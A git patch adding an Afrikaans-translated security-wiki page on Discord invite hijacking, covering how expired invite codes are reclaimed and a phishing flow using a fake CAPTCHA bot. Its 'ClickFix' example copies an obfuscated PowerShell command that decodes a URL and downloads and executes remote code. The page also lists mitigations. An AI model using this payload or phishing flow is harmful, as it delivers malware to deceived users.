From 25ef2626a30dad9d7f7278b8f68532a9e2f2cd30 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 8 Jul 2025 19:26:29 +0000 Subject: [PATCH] Translated ['src/generic-methodologies-and-resources/phishing-methodolog --- src/SUMMARY.md | 1 + .../discord-invite-hijacking.md | 61 +++++++++++++++++++ 2 files changed, 62 insertions(+) create mode 100644 src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index e099c09b3..d57d5effd 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -29,6 +29,7 @@ - [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md) - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md) - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md) + - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md) - [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md) - [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md) - [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md new file mode 100644 index 000000000..005ee9a37 --- /dev/null +++ b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md @@ -0,0 +1,61 @@ +# Discord Invite Hijacking + +{{#include ../../banners/hacktricks-training.md}} + +Discord se uitnodigingstelsel se kwesbaarheid laat bedreigingsakteurs toe om vervalde of verwyderde uitnodigingskodes (tydelik, permanent, of pasgemaakte vanity) as nuwe vanity skakels op enige vlak 3 geboost bediener te eis. Deur alle kodes na kleinletters te normaliseer, kan aanvallers bekende uitnodigingskodes vooraf registreer en stilweg verkeer oorneem sodra die oorspronklike skakel verval of die bronbediener sy boost verloor. + +## Uitnodigingstipes en Hijack Risiko + +| Uitnodigingstype | Hijackable? | Voorwaarde / Kommentaar | +|-----------------------|-------------|------------------------------------------------------------------------------------------------------------| +| Tydelike Uitnodiging Skakel | ✅ | Na vervaldatum word die kode beskikbaar en kan dit weer geregistreer word as 'n vanity URL deur 'n geboost bediener. | +| Permanente Uitnodiging Skakel | ⚠️ | As verwyder en slegs uit kleinletters en syfers bestaan, kan die kode weer beskikbaar raak. | +| Pasgemaakte Vanity Skakel | ✅ | As die oorspronklike bediener sy vlak 3 Boost verloor, word sy vanity uitnodiging beskikbaar vir nuwe registrasie. | + +## Exploitasiestappe + +1. Verkenning +- Monitor openbare bronne (forums, sosiale media, Telegram-kanale) vir uitnodigingskakels wat die patroon `discord.gg/{code}` of `discord.com/invite/{code}` volg. +- Versamel uitnodigingskodes van belang (tydelik of vanity). +2. Voorregistrasie +- Skep of gebruik 'n bestaande Discord-bediener met vlak 3 Boost voorregte. +- In **Bedienerinstellings → Vanity URL**, probeer om die teikenuitnodigingskode toe te ken. As aanvaar, word die kode gereserveer deur die kwaadwillige bediener. +3. Hijack Aktivering +- Vir tydelike uitnodigings, wag totdat die oorspronklike uitnodiging verval (of verwyder dit handmatig as jy die bron beheer). +- Vir kodes wat hoofletters bevat, kan die kleinlettervariant onmiddellik geëis word, alhoewel omleiding slegs na vervaldatum aktiveer. +4. Stilweg Omleiding +- Gebruikers wat die ou skakel besoek, word na die aanvaller-beheerde bediener gestuur sodra die hijack aktief is. + +## Phishing Stroom via Discord Bediener + +1. Beperk bedienerkanale sodat slegs 'n **#verify** kanaal sigbaar is. +2. Ontplooi 'n bot (bv. **Safeguard#0786**) om nuwelinge te vra om via OAuth2 te verifieer. +3. Bot lei gebruikers na 'n phishing-webwerf (bv. `captchaguard.me`) onder die dekmantel van 'n CAPTCHA of verifikasiefase. +4. Implementeer die **ClickFix** UX truuk: +- Vertoon 'n gebroke CAPTCHA boodskap. +- Lei gebruikers om die **Win+R** dialoog te open, plak 'n vooraf gelaaide PowerShell-opdrag, en druk Enter. + +### ClickFix Clipboard Injection Voorbeeld +```javascript +// Copy malicious PowerShell command to clipboard +const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` + +`$u=($r[-1..-($r.Length)]-join '');` + +`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` + +`iex (iwr -Uri $url)"`; +navigator.clipboard.writeText(cmd); +``` +Hierdie benadering vermy direkte lêeraflaaie en benut bekende UI-elemente om gebruikers se wantroue te verlaag. + +## Versagtings + +- Gebruik permanente uitnodigingsskakels wat ten minste een hoofletter of nie-alfanumeriese karakter bevat (nooit verval, nie herbruikbaar nie). +- Draai uitnodigingskodes gereeld om en herroep ou skakels. +- Monitor Discord-bediener se boost-status en vaniteit-URL-eise. +- Onderwys gebruikers om die egtheid van die bediener te verifieer en om te verhoed dat hulle op die klembord-geplakte opdragte uitvoer. + +## Verwysings + +- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/ +- Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link + +{{#include /banners/hacktricks-training.md}}